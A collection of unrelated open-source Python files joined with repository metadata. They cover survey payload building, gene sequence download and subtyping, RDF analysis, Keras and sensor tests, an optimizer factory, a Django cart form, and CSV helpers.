        "flushed": flushed,
        "submitted_at": submitted_at.isoformat(),
        "collection": build_collection(metadata),
        "metadata": build_metadata(metadata),
        "launch_language_code": metadata.get("language_code", DEFAULT_LANGUAGE_CODE),
    }

    optional_properties = get_optional_payload_properties(metadata, response_metadata)

    # The 'data' shape depends on the schema's declared data version.
    if schema.json["data_version"] == "0.0.3":
        payload["data"] = {
            "answers": convert_answers_to_payload_0_0_3(
                answer_store, list_store, schema, routing_path
            ),
            "lists": list_store.serialize(),
        }
    elif schema.json["data_version"] == "0.0.1":
        payload["data"] = convert_answers_to_payload_0_0_1(
            metadata, answer_store, list_store, schema, routing_path
        )
    else:
        raise DataVersionError(schema.json["data_version"])

    logger.info("converted answer ready for submission")

    # dict union operator requires Python 3.9+.
    return payload | optional_properties
def build_collection(metadata) -> Mapping[str, str]:
    """Build the downstream 'collection' block from runner metadata."""
    key_pairs = (
        ("exercise_sid", "collection_exercise_sid"),
        ("schema_name", "schema_name"),
        ("period", "period_id"),
    )
    return {target: metadata[source] for target, source in key_pairs}
def build_metadata(metadata) -> Mapping[str, str]:
    """Build downstream metadata; optional reference dates and the display
    address are copied across only when present and truthy."""
    downstream_metadata = {"user_id": metadata["user_id"], "ru_ref": metadata["ru_ref"]}
    optional_keys = {
        "ref_p_start_date": "ref_period_start_date",
        "ref_p_end_date": "ref_period_end_date",
        "display_address": "display_address",
    }
    for source, target in optional_keys.items():
        value = metadata.get(source)
        if value:
            downstream_metadata[target] = value
    return downstream_metadata
def get_optional_payload_properties(metadata, response_metadata) -> Mapping[str, str]:
    """Collect the optional top-level payload properties that carry truthy values."""
    payload = {
        key: metadata[key]
        for key in ("channel", "case_type", "form_type", "region_code", "case_ref")
        if metadata.get(key)
    }
    started_at = response_metadata.get("started_at")
    if started_at:
        payload["started_at"] = started_at
    return payload
| 2.453125 | 2 |
phylotyper/data/download/blast_stx1a_genes.py | superphy/insilico-subtyping | 5 | 12765084 | <gh_stars>1-10
#!/usr/bin/env python
"""Download Stx1a gene sequences from Genbank
Example:
$ python blast_stx1a_genes.py .
"""
import argparse
import csv
import logging
import os
import re
from Bio import SeqIO
from utils import DownloadUtils, SubtypeParser, GeneFilter
from blast import Blast
__author__ = "<NAME>"
__copyright__ = "Copyright Government of Canada 2012-2015. Funded by the Government of Canada Genomics Research and Development Initiative"
__license__ = "APL"
__version__ = "2.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
logging.basicConfig(
filename='blast_stx1a_genes.log',
level=logging.DEBUG,
format='%(asctime)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p',
filemode='w')
logger = logging.getLogger(__name__)
if __name__ == "__main__":
"""Run
"""
# Parse command-line args
parser = argparse.ArgumentParser(description='Download and store NCBI blast results')
parser.add_argument('fasta_file', action="store")
parser.add_argument('output_directory', action="store")
args = parser.parse_args()
tmp_fasta_file = os.path.join(args.output_directory, 'tmp.fasta')
# blast = Blast("Escherichia coli")
# blast.run(args.fasta_file, tmp_fasta_file)
# Initialize serotype parser
seq_tests = [lambda x: len(x) > 900]
gfilter = GeneFilter(sequence_tests=seq_tests)
# Initialize Subtype parser
subtype_names = '(1a|1b|1c|1d)\b'
pattern1 = "(?:stx)?[-_\s]?%s" % subtype_names
parser = SubtypeParser([re.compile(pattern1, flags=re.IGNORECASE)], source_fields=['organism','strain'],
annotation_fields=['source','organism'])
# Initialize Download object
dutil = DownloadUtils(args.output_directory, '<NAME>', ['stx1a'], parser, gfilter)
# Perform Downloads
dutil.download_by_accession(tmp_fasta_file, fasta_format=True)
# Parse genbank files for H-types
dutil.parse_subtype()
# Generate final output
invalid = set([])
subtypes = {}
for row in csv.reader(open(dutil.subtypefile,'r'),delimiter='\t'):
name = row[0]
subt = row[1]
if not name in subtypes:
# Never seen before
subtypes[name] = subt
elif subtypes[name] == subt:
# Non-conflicting duplicates
logger.info("Duplicate instances of {}, subtype:{} in subtype file: {}".format(name,subt,dutil.subtypefile))
else:
# Conflict
logger.warning("Duplicate instances of {} with conflicting subtypes: {} vs {} in subtype file: {}. Removing entry.".format(name,subt,
subtypes[name],dutil.subtypefile))
invalid.add(name)
seqs = {}
invalid2 = set([])
with open(tmp_fasta_file, 'r') as infh:
for seqrecord in SeqIO.parse(infh, 'fasta'):
name = seqrecord.id
seq = seqrecord.seq
if not name in invalid:
if name in subtypes:
# Has matching subtype
if name in seqs:
# Duplicate in fasta file
if seqs[name] == seq:
logger.info("Duplicate instances of {} in fasta file: {}".format(name, dutil.fastafile))
else:
logger.warning("Duplicate instances of {} with conflicting sequences in fasta file: {}".format(name, dutil.fastafile))
invalid2.add(name)
else:
# novel sequence with subtype
seqs[name] = seq
else:
# No matching subtype
logger.info("No subtype for sequence {} in fasta file: {}".format(name, dutil.fastafile))
with open(dutil.fastafile, 'w') as outfh, open(dutil.subtypefile, 'w') as subtfh:
for name in seqs:
outfh.write('>{}\n{}\n'.format(name, seqs[name]))
subtfh.write('{}\t{}\n'.format(name, subtypes[name]))
| 2.6875 | 3 |
Trescope4Python/example/src/example_add_control.py | chenhebing/Trescope | 1 | 12765085 | import os
from typing import List
from trescope import Trescope
from trescope.config import ImageConfig
from trescope.controller import EnumControl
from trescope.toolbox import simpleDisplayOutputs
import pandas as pd
def clearTrescope():
    """Clear the first four Trescope output panes."""
    for output_index in range(4):
        Trescope().selectOutput(output_index).clear()
def add_control():
    """Demo: show model images batch-by-batch in Trescope and collect
    per-image label controls (shape and thickness) into a DataFrame."""
    path = '../data/res/model_images'
    model_images: List[str] = os.listdir(path)
    Trescope().initialize(True, simpleDisplayOutputs(1, 4))
    df = pd.DataFrame({'file': [], 'shape': [], 'thickness': []})
    batch_size = 2
    for batch_index in range(len(model_images) // batch_size):
        clearTrescope()
        for sample_index in range(batch_size):
            model_image_path = model_images[batch_index * batch_size + sample_index]
            # Even panes show the image; odd panes host the label controls.
            Trescope().selectOutput(sample_index * 2).plotImage(os.path.join(path, model_image_path)).withConfig(ImageConfig())
            (Trescope().selectOutput(sample_index * 2 + 1).asInput()
             .addControl(EnumControl().id('file').label('File').enumeration(model_image_path).defaultValue(model_image_path))
             .addControl(EnumControl().id('shape').label('Circle or Square').enumeration('circle', 'square').defaultValue('circle'))
             .addControl(EnumControl().id('thickness').label('Size').enumeration('xs', 's', 'm', 'l', 'xl').defaultValue('m')))
        # Block until the user submits labels for this batch.
        label_data = Trescope().breakPoint(f'batch_index:{batch_index}')
        # Bug fix: DataFrame.append was deprecated and removed in pandas 2.x;
        # build the rows first and concatenate instead.
        new_rows = [{'file': row['file'], 'shape': row['shape'], 'thickness': row['thickness']}
                    for row in label_data.values()]
        if new_rows:
            df = pd.concat([df, pd.DataFrame(new_rows)], ignore_index=True)
    print(df)
if __name__ == '__main__':
add_control()
| 2.21875 | 2 |
starpolymers/analysis/rdf.py | jakublala/starpolymers | 6 | 12765086 | <reponame>jakublala/starpolymers
import numpy as np
import scipy.spatial.distance as D
import pandas as pd
from math import pi
import matplotlib.pyplot as plt
def _volume(bins):
shell_width = bins[1] - bins[0]
return 4 * pi * bins ** 2 * shell_width
def _get_distance_vector(first, second, rmin, rmax):
array = D.cdist(first, second)
vector = np.ravel(array)
vector = vector[vector>=rmin]
vector = vector[vector<rmax]
return vector
def _bins(rmin, rmax, binwidth):
    """Bin edges from rmin (inclusive) to rmax (exclusive) spaced by binwidth."""
    return np.arange(rmin, rmax, binwidth)
def _get_histogram(vector, bins):
    """Return numpy's (counts, edges) histogram of the distance vector over *bins*."""
    return np.histogram(vector, bins=bins)
def _get_rdf(histogram_object, bulk_density):
    """Normalise histogram counts into g(r): counts / shell volume / bulk density."""
    counts, edges = histogram_object
    # shift edges to bin centres, dropping the trailing edge
    centres = (edges + 0.5)[:-1]
    per_volume = counts / _volume(centres)
    result = pd.DataFrame()
    result['r'] = centres
    result['g(r)'] = per_volume / bulk_density
    return result
def _get_condensed_radius(df):
return df['r'][df['g(r)'].idxmax]
def _plot_rdf(rdf, ax):
ax.plot(rdf.values[:,0], rdf.values[:,1],'-')
ax.set_xlabel('r', fontsize='large')
ax.set_ylabel('g(r)', fontsize='large')
def _get_average(RDF_LIST):
counter = 0
dataframe = pd.DataFrame()
temp = pd.DataFrame()
for rdf in RDF_LIST:
counter +=1
if counter == 1:
dataframe['r'] = rdf.rdf['r']
temp[counter] = rdf.rdf['g(r)'].values
dataframe['g(r)'] = np.mean(temp.values, axis=1)
return dataframe
def _get_NC(first, second, cutoff):
count = 0
for atom in second:
distances = D.cdist(first, atom.reshape(1,3))
if not len(distances[distances<=cutoff]):
continue
else:
count+=1
return count
class RDF():
    """Radial distribution function g(r) of ``atoms2`` around ``atoms1``.

    Also derives the condensed radius (the r at which g(r) peaks, unless one
    is supplied) and ``NC``, the number of atoms2 within that radius of atoms1.
    """
    def __init__(self, atoms1, atoms2, bin_width=1.0, rmin=0.0, rmax=20.0, L=70, condensed_radius=None):
        # pairwise distances restricted to [rmin, rmax)
        self.distances = _get_distance_vector(atoms1, atoms2, rmin, rmax)
        self.histogram = _get_histogram(self.distances, _bins(rmin, rmax, bin_width))
        # bulk number density of atoms2 in a cubic box of side L
        self.density = float(len(atoms2)) / L ** 3
        self.rdf = _get_rdf(self.histogram, self.density)
        # idiom fix: identity test against None instead of `!= None`
        if condensed_radius is not None:
            self.condensed_radius = condensed_radius
        else:
            self.condensed_radius = _get_condensed_radius(self.rdf)
        self.NC = _get_NC(atoms1, atoms2, self.condensed_radius)
    def plot(self, show=True):
        """Plot g(r) on a fresh figure; display it when *show* is True."""
        fig, ax = plt.subplots()
        _plot_rdf(self.rdf, ax)
        if show:
            plt.show()
class RDF_AVERAGE():
    """Ensemble average over a list of RDF objects."""
    def __init__(self, RDF_LIST):
        self.rdf = _get_average(RDF_LIST)
    def plot(self, show=True):
        """Render the averaged g(r) curve; display it when *show* is True."""
        figure, axis = plt.subplots()
        _plot_rdf(self.rdf, axis)
        if show:
            plt.show()
def _collate(RDF_LIST):
counter = 1
results = pd.DataFrame()
for i in RDF_LIST:
if counter == 1:
results['r'] = i.rdf['r']
results['{}_g(r)'.format(counter)] = i.rdf['g(r)']
counter+=1
return results
def _plot_list(RDF_LIST_OBJ, ax):
for i in range(1, RDF_LIST_OBJ.N+1):
ax.plot(RDF_LIST_OBJ.rdf['r'], RDF_LIST_OBJ.rdf['{}_g(r)'.format(i)], '-', label=i)
class RDF_LIST():
    """Collection of RDFs collated into one DataFrame with a shared r axis."""
    def __init__(self, RDF_LIST):
        self.N = len(RDF_LIST)
        self.rdf = _collate(RDF_LIST)
    def plot(self, show=True):
        """Overlay all member g(r) curves with a legend; display when *show* is True."""
        figure, axis = plt.subplots()
        _plot_list(self, axis)
        axis.set_xlabel('r', fontsize='large')
        axis.set_ylabel('g(r)', fontsize='large')
        axis.legend()
        if show:
            plt.show()
tests/keras/layers/test_embeddings.py | nishank974/Keras | 2 | 12765087 | import pytest
import numpy as np
from numpy.testing import assert_allclose
from keras.models import Sequential
from keras.layers.core import Dense, Activation, Flatten
from keras.layers.embeddings import Embedding
from keras.constraints import unitnorm
from keras import backend as K
X1 = np.array([[1], [2]], dtype='int32')
W1 = np.array([[0.1, 0.2], [0.3, 0.4], [0.5, 0.6]], dtype='float32')
def test_unitnorm_constraint():
    """After one training step, W_constraint=unitnorm() must leave every
    embedding-weight column with unit L2 norm."""
    lookup = Sequential()
    lookup.add(Embedding(3, 2, weights=[W1],
                         W_constraint=unitnorm(),
                         input_length=1))
    lookup.add(Flatten())
    lookup.add(Dense(1))
    lookup.add(Activation('sigmoid'))
    lookup.compile(loss='binary_crossentropy', optimizer='sgd',
                   class_mode='binary')
    # one SGD step triggers the constraint's weight projection
    lookup.train_on_batch(X1, np.array([[1], [0]], dtype='int32'))
    norm = np.linalg.norm(K.get_value(lookup.trainable_weights[0]), axis=0)
    assert_allclose(norm, np.ones_like(norm).astype('float32'), rtol=1e-05)
if __name__ == '__main__':
pytest.main([__file__])
| 2.328125 | 2 |
arametrics-test-app/config/config.py | AravinthPanch/araMetrics | 0 | 12765088 | TEST_API_ENDPOINT='https://aravinth.info'
| 1.015625 | 1 |
tests/_OLD_test_sensor_SenseHat.py | mlanser/sciLab-sensorMod | 0 | 12765089 | import time
import pytest
from libs.sensorMod.src.sensor_SenseHat import Sensor
# =========================================================
# G L O B A L S & P Y T E S T F I X T U R E S
# =========================================================
@pytest.fixture()
def valid_attribs():
    """A complete, valid attribute dict for constructing a Sensor under test."""
    return {
        'repeat': 1,            # Number of times to run speed test
        'holdTime': 60,         # Amount of time between tests
        'location': '- n/a -',
        'locationTZ': 'Etc/UTC',
        'tempUnit': 'C',        # Temp display unit: 'C' (Celsius), 'F' (Fahrenheit), 'K' (Kelvin)
        'enviro': True,         # Get environmental data (i.e. temperature, humidity, and pressure)
        'IMU': True,            # Get IMU (inertial measurement unit) data
    }
def _init_sensor(mocker, attribs):
    """Build a Sensor and stub out every SenseHat reader plus time.sleep.

    The eight copy-pasted ``mocker.patch.object`` calls are collapsed into a
    single loop over the method names, so adding a sensor needs one line.
    """
    sensor = Sensor(attribs)
    for method in (
        'get_temperature',
        'get_temperature_from_humidity',
        'get_humidity',
        'get_pressure',
        'get_orientation',
        'get_compass_raw',
        'get_accelerometer_raw',
        'get_gyroscope_raw',
    ):
        mocker.patch.object(sensor._sensehat, method)
    mocker.patch.object(time, 'sleep')
    return sensor
# =========================================================
# T E S T F U N C T I O N S
# =========================================================
@pytest.mark.smoke
def test_get_data(mocker, valid_attribs):
    """get_data() must query every SenseHat sensor exactly once.

    Collapses the eight repeated assert_called_once() lines into a loop and
    drops the unused ``attribs`` alias from the original.
    """
    sensor = _init_sensor(mocker, valid_attribs)
    sensor.get_data()
    for method in (
        'get_temperature',
        'get_temperature_from_humidity',
        'get_humidity',
        'get_pressure',
        'get_orientation',
        'get_compass_raw',
        'get_accelerometer_raw',
        'get_gyroscope_raw',
    ):
        getattr(sensor._sensehat, method).assert_called_once()
| 2.203125 | 2 |
python/problems/jewels_and_stones.py | vivaxy/algorithms | 1 | 12765090 | """
https://leetcode.com/problems/jewels-and-stones/
https://leetcode.com/submissions/detail/138688434/
"""
class Solution:
    def numJewelsInStones(self, J, S):
        """
        :type J: str
        :type S: str
        :rtype: int
        """
        # Total occurrences in S of every jewel character in J.
        return sum(S.count(jewel) for jewel in J)
import unittest
class Test(unittest.TestCase):
    def test(self):
        """Check the two reference cases from the problem statement."""
        solver = Solution()
        for jewels, stones, expected in (('aA', 'aAAbbbb', 3), ('z', 'ZZ', 0)):
            self.assertEqual(solver.numJewelsInStones(jewels, stones), expected)
if __name__ == '__main__':
unittest.main()
| 3.734375 | 4 |
src/deepsparse/utils/data.py | SkalskiP/deepsparse | 460 | 12765091 | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from typing import List
import numpy
from deepsparse.utils.log import log_init
__all__ = [
"arrays_to_bytes",
"bytes_to_arrays",
"verify_outputs",
]
log = log_init(os.path.basename(__file__))
def arrays_to_bytes(arrays: List[numpy.array]) -> bytearray:
    """
    :param arrays: List of numpy arrays to serialize as bytes
    :return: bytearray representation of list of numpy arrays
    """
    separator = bytearray("|", "utf-8")
    payload = bytearray()
    for array in arrays:
        # record layout per array: dtype | shape | raw bytes
        dtype_part = bytearray(str(array.dtype), "utf-8")
        shape_part = bytearray(",".join(str(dim) for dim in array.shape), "utf-8")
        payload += dtype_part + separator + shape_part + separator + array.ravel().tobytes()
    return payload
def bytes_to_arrays(serialized_arr: bytearray) -> List[numpy.array]:
    """
    :param serialized_arr: bytearray representation of list of numpy arrays
    :return: List of numpy arrays decoded from input
    """
    separator = "|".encode("utf-8")
    decoded = []
    cursor = 0
    while cursor < len(serialized_arr) - 1:
        # header: dtype|shape| then the raw array bytes
        dtype_end = serialized_arr.find(separator, cursor)
        shape_end = serialized_arr.find(separator, dtype_end + 1)
        dtype = numpy.dtype(serialized_arr[cursor:dtype_end].decode("utf-8"))
        shape = tuple(
            int(dim) for dim in serialized_arr[dtype_end + 1:shape_end].decode("utf-8").split(",")
        )
        num_bytes = numpy.prod(shape) * dtype.itemsize
        data_start = shape_end + 1
        raw = serialized_arr[data_start:data_start + num_bytes]
        decoded.append(numpy.frombuffer(raw, dtype=dtype).reshape(shape).copy())
        cursor = data_start + num_bytes
    return decoded
def verify_outputs(
    outputs: List[numpy.array],
    gt_outputs: List[numpy.array],
    atol: float = 8.0e-4,
    rtol: float = 0.0,
) -> List[float]:
    """
    Compares two lists of output tensors, checking that they are sufficiently similar
    :param outputs: List of numpy arrays, usually model outputs
    :param gt_outputs: List of numpy arrays, usually reference outputs
    :param atol: Absolute tolerance for allclose
    :param rtol: Relative tolerance for allclose
    :return: The list of max differences for each pair of outputs
    """
    if len(outputs) != len(gt_outputs):
        raise Exception(
            f"number of outputs doesn't match, {len(outputs)} != {len(gt_outputs)}"
        )
    max_diffs = []
    for i, (output, gt_output) in enumerate(zip(outputs, gt_outputs)):
        if output.shape != gt_output.shape:
            raise Exception(
                f"output shapes don't match, {output.shape} != {gt_output.shape}"
            )
        if type(output) != type(gt_output):
            raise Exception(
                f"output types don't match, {type(output)} != {type(gt_output)}"
            )
        max_diff = numpy.max(numpy.abs(output - gt_output))
        max_diffs.append(max_diff)
        log.info(f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}")
        if not numpy.allclose(output, gt_output, rtol=rtol, atol=atol):
            raise Exception(
                "output data doesn't match\n"
                f"output {i}: {output.shape} {gt_output.shape} MAX DIFF: {max_diff}\n"
                f" mean = {numpy.mean(output):.5f} {numpy.mean(gt_output):.5f}\n"
                f" std = {numpy.std(output):.5f} {numpy.std(gt_output):.5f}\n"
                f" max = {numpy.max(output):.5f} {numpy.max(gt_output):.5f}\n"
                f" min = {numpy.min(output):.5f} {numpy.min(gt_output):.5f}"
            )
    return max_diffs
| 2.484375 | 2 |
scripts/busqueda_codon_secuencia.py | rod13-afk/python_class | 0 | 12765092 | <gh_stars>0
'''
NAME
Busqueda del Codón inicial y secuencia transcrita
VERSION
1.0
AUTHOR
<NAME>
DESCRIPTION
Find the start codon and the transcribed sequence
CATEGORY
Genomic sequence
INPUT
Read a DNA sequence entered by the user
OUTPUT
Returns as output the start and end positions of the sequence
to be transcribed and its nucleotide sequence
EXAMPLES
Input
dna = 'AAGGTACGTCGCGCGTTATTAGCCTAAT'
Output
El codon AUG empieza en la posicion 4 y termina en 19, tomando en cuenta el 0 como
la posicion del primer nucleotido.
Fragmento de RNA que es transcrito representado en DNA es: TACGTCGCGCGTTAT
Fragmento de RNA que es transcrito representado en RNA es: UACGUCGCGCGUUAU
'''
print('Introduzca la secuencia de DNA de interes:')
dna = input() # La secuencia input se almacena en la variable dna
codon_inicio = 'TAC'
codon_termino = 'ATT'
'''El metodo str.find() devuelve el índice más bajo en el que se encuentre
el codon de inicio, aplicado tambien para encontrar la posicion del codon de termino'''
inicio = dna.find(codon_inicio)
final = dna.find(codon_termino)
'''Se corta la secuencia para obtener la secuencia transcrita y se suma 2 para
incluir el codon de paro completo en el output'''
transcrito = dna[inicio:final + 2]
print('El codon AUG empieza en la posicion ' + str(inicio) + ' y termina en ' + str(final + 2) + ', tomando en cuenta el 0 como la posicion del primer nucleotido.')
print('Fragmento de RNA que es transcrito representado en DNA es: ' + transcrito)
print('Fragmento de RNA que es transcrito representado en RNA es: ' + transcrito.replace('T', 'U'))
| 4.09375 | 4 |
py/gps_building_blocks/airflow/utils/errors.py | miguelfc/gps_building_blocks | 0 | 12765093 | # python3
# coding=utf-8
# Copyright 2020 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Errors file for this data connector component.
All exceptions defined by the library should be in this file.
"""
from typing import Text
class Error(Exception):
    """Base error class for all Exceptions.

    Can store a custom message and a previous error, if exists, for more
    details and stack tracing use.
    """

    def __init__(self, msg: Text = '', error: Exception = None) -> None:
        super().__init__()
        self.msg = msg
        self.prev_error = error

    def __repr__(self) -> Text:
        description = type(self).__name__
        if self.msg:
            description = f'{description} {self.msg}'
        if self.prev_error:
            description = f'{description}: {self.prev_error}'
        return description

    __str__ = __repr__
# Datastore related errors
class DatastoreError(Error):
    """Raised when Datastore returns an error; base for all Datastore errors."""
    pass
class DatastoreRunQueryError(DatastoreError):
    """Raised when querying Datastore returns an error."""
    pass
class DatastoreCommitError(DatastoreError):
    """Raised when committing to Datastore fails."""
    pass
class DatastoreInsertBlobInfoError(DatastoreCommitError):
    """Raised when inserting blob info into Datastore fails."""
    pass
class DatastoreUpdateBlobInfoError(DatastoreCommitError):
    """Raised when updating blob info in Datastore fails."""
    pass
# Data in connector related errors
class DataInConnectorError(Error):
    """Raised when an input data source connector returns an error."""
    pass
class DataInConnectorBlobParseError(DataInConnectorError):
    """Raised when parsing blob contents fails."""
    pass
class DataInConnectorValueError(DataInConnectorError):
    """Raised when a wrong value is passed to an input connector."""
    pass
# Data out connector related errors
class DataOutConnectorError(Error):
    """Raised when an output data source connector returns an error."""
    pass
class DataOutConnectorValueError(DataOutConnectorError):
    """Raised when a wrong value is passed to an output connector."""
    pass
class DataOutConnectorInvalidPayloadError(DataOutConnectorError):
    """Raised when constructing or handling a payload fails."""
    pass
class DataOutConnectorSendUnsuccessfulError(DataOutConnectorError):
    """Raised when sending data to the data out source fails."""
    pass
class DataOutConnectorBlobReplacedError(DataOutConnectorError):
    """Raised when, while sending blob contents, the blob was replaced."""
    pass
class DataOutConnectorBlobProcessError(DataOutConnectorError):
    """Raised when only some parts of the blob contents could be sent."""
    pass
| 2.59375 | 3 |
optaradio/ui/input/keyboard.py | p4cx/optaradio | 2 | 12765094 | import sys
import pygame as pg
from ui.input import control
def check_keyboard_events(window, state):
    """Poll pygame events and dispatch keyboard shortcuts to UI controls.

    Replaces the long repetitive ``elif`` chain with two dispatch tables:
    one for dedicated action keys, one for the favourite-station digits 1-7.
    Returns the polled event list so callers can process it further.
    """
    def close():
        pg.quit()
        sys.exit()

    # Keys with dedicated actions; rebuilt per call so window/state are current.
    key_actions = {
        pg.K_ESCAPE: close,
        pg.K_RETURN: lambda: control.central_button(window, state),
        pg.K_UP: lambda: control.scroll_menu_up(window, state),
        pg.K_DOWN: lambda: control.scroll_menu_down(window, state),
        pg.K_q: lambda: control.back(window, state),
        pg.K_w: lambda: control.switch_audio(window, state),
        pg.K_e: lambda: control.switch_led(window, state),
        pg.K_r: lambda: control.open_setting(window, state),
    }
    # Digit keys 1-7 select the corresponding favourite.
    favourite_keys = {getattr(pg, 'K_{}'.format(number)): number for number in range(1, 8)}

    events = pg.event.get()
    for event in events:
        if event.type == pg.QUIT:
            close()
        elif event.type == pg.KEYDOWN:
            if event.key in key_actions:
                key_actions[event.key]()
            elif event.key in favourite_keys:
                control.play_favourite(window, state, favourite_keys[event.key])
    return events
| 2.84375 | 3 |
elit/optimizers/adamw/__init__.py | emorynlp/levi-graph-amr-parser | 9 | 12765095 | # -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-11-11 18:44
import tensorflow as tf
from elit.optimizers.adamw.optimization import WarmUp, AdamWeightDecay
# from elit.optimization.adamw.optimizers_v2 import AdamW
# from elit.optimization.adamw.utils import get_weight_decays
# def create_optimizer(model, init_lr, num_train_steps, num_warmup_steps):
# """Creates an optimizer with learning rate schedule."""
# wd_dict = get_weight_decays(model)
#
# # Implements linear decay of the learning rate.
# learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
# initial_learning_rate=init_lr,
# decay_steps=num_train_steps,
# end_learning_rate=0.0)
# if num_warmup_steps:
# learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
# decay_schedule_fn=learning_rate_fn,
# warmup_steps=num_warmup_steps)
# optimizer = AdamW(
# learning_rate=learning_rate_fn,
# weight_decay_rate=0.01,
# beta_1=0.9,
# beta_2=0.999,
# epsilon=1e-6,
# exclude_from_weight_decay=['layer_norm', 'bias'])
# return optimizer
def create_optimizer(init_lr, num_train_steps, num_warmup_steps, weight_decay_rate=0.01, epsilon=1e-6, clipnorm=None):
    """Creates an optimizer with learning rate schedule.

    Args:
        init_lr: initial learning rate for the polynomial decay schedule
        num_train_steps: total decay steps down to a final rate of 0.0
        num_warmup_steps: if truthy, wrap the schedule in linear warm-up
        weight_decay_rate: decoupled weight decay rate (Default value = 0.01)
        epsilon: Adam epsilon (Default value = 1e-6)
        clipnorm: optional gradient norm clipping (Default value = None)

    Returns:
        An AdamWeightDecay optimizer with LayerNorm/bias excluded from decay.
    """
    # Learning rate decays linearly (power=1 polynomial) to zero.
    lr_schedule = tf.keras.optimizers.schedules.PolynomialDecay(
        initial_learning_rate=init_lr,
        decay_steps=num_train_steps,
        end_learning_rate=0.0)
    if num_warmup_steps:
        lr_schedule = WarmUp(initial_learning_rate=init_lr,
                             decay_schedule_fn=lr_schedule,
                             warmup_steps=num_warmup_steps)
    extra_kwargs = {'clipnorm': clipnorm} if clipnorm else {}
    return AdamWeightDecay(
        learning_rate=lr_schedule,
        weight_decay_rate=weight_decay_rate,
        beta_1=0.9,
        beta_2=0.999,
        epsilon=epsilon,
        exclude_from_weight_decay=['LayerNorm', 'bias'],
        **extra_kwargs
    )
| 2.3125 | 2 |
angalabiri/shop/forms/cartform.py | dark-codr/ebiangala | 1 | 12765096 | from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import (
Column,
HTML,
Field,
Fieldset,
Layout,
Row,
Submit,
BaseInput,
)
from crispy_forms.bootstrap import InlineField, UneditableField
from crispy_forms import layout
PRODUCT_QUANTITY_CHOICES = [(i, str(i)) for i in range(1, 200)]
class CartAddProductForm(forms.Form):
    """Form for adding a product (with a quantity) to the shopping cart."""
    # Quantity rendered as a narrow text input; coerced to int on submit.
    quantity = forms.TypedChoiceField(
        choices=PRODUCT_QUANTITY_CHOICES,
        coerce=int,
        required=False,
        widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
    )
    # Hidden flag: True means update an existing cart line rather than add a new one.
    update = forms.BooleanField(
        widget=forms.HiddenInput(), initial=False, required=False
    )
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.helper = FormHelper()
        # NOTE(review): crispy's BaseInput is normally subclassed (e.g. Submit),
        # not instantiated directly -- confirm this renders as intended.
        self.helper.layout = Layout(
            BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
            Submit("Add To Cart", "Add to Cart", css_class="add-to-cart button m-0"),
        )
# class ListCartAddProductForm(forms.Form):
# quantity = forms.TypedChoiceField(
# choices=PRODUCT_QUANTITY_CHOICES,
# coerce=int,
# required=False,
# widget=forms.TextInput(attrs={'class': 'qty', 'style':'width:60px; padding: 8.7px;'})
# )
# update = forms.BooleanField(
# widget=forms.HiddenInput(), initial=False, required=False
# )
# def __init__(self, *args, **kwargs):
# super().__init__(*args, **kwargs)
# self.helper = FormHelper()
# self.helper.layout = Layout(
# BaseInput("quantity", value=1, style="width:50px;", add_class="qty"),
# Submit("Add To Cart", "Add To Cart", css_class="add-to-cart button m-0"),
# )
# <i class="icon-shopping-cart"></i>
| 2.390625 | 2 |
yakutils/_csv.py | kdebowski/yakutils | 0 | 12765097 | """This module contains boilerplate csv helpers."""
import csv
def read_csv(filename):
    """Read a CSV file.

    **Example**:
        >>> read_csv('/path/to/data.csv')
        [{ 'name': 'foo' }]

    :param filename:
        Path to CSV file.
    :return:
        A Python representation of the CSV document.
    """
    # Let DictReader consume the header itself: the previous manual
    # replace('"','').split(',') parse broke on quoted headers containing
    # commas. newline='' is the csv-module-recommended open mode.
    with open(filename, newline="") as fh:
        return [dict(row) for row in csv.DictReader(fh)]
def iter_csv(filename):
    """Iterate a CSV file.

    **Example**:
        >>> for item in iter_csv('/path/to/data.csv'):
        ...     print(item)
        [{ 'name': 'foo' }]

    :param filename:
        Path to CSV file.
    :yield:
        A Python ``dict`` representation of a CSV row.
    """
    # Same header-parsing fix as read_csv: DictReader reads the header row
    # correctly even when field names are quoted and contain commas.
    with open(filename, newline="") as fh:
        for row in csv.DictReader(fh):
            yield dict(row)
| 4 | 4 |
alveus/variable_mgr.py | FrederikLehn/alveus | 0 | 12765098 | from datetime import date
import numpy as np
from matplotlib.lines import Line2D
from _ids import *
import _icons as ico
from utilities import pydate2wxdate, wxdate2pydate, GetAttributes
from properties import SummaryProperty
class VariableManager:
    """Registry that instantiates every known variable and exposes generic lookups.

    Each variable is stored on a private attribute named ``_<id>`` so that
    ``GetVariable``/``Get`` can resolve it with ``getattr``; user-defined
    summary variables live in the ``_summaries`` dict instead. A square
    correlation matrix (list of lists) is maintained for all static and
    scaler variables.
    """
    def __init__(self, unit_system):
        # simulation dependent -----------------------------------------------------------------------------------------
        # times
        self._time = Time()
        self._date = Date()
        # potentials
        self._oil_potential = OilPotential(unit_system)
        self._gas_potential = GasPotential(unit_system)
        self._water_potential = WaterPotential(unit_system)
        self._liquid_potential = LiquidPotential(unit_system)
        self._lift_gas_potential = LiftGasPotential(unit_system)
        self._gas_injection_potential = GasInjectionPotential(unit_system)
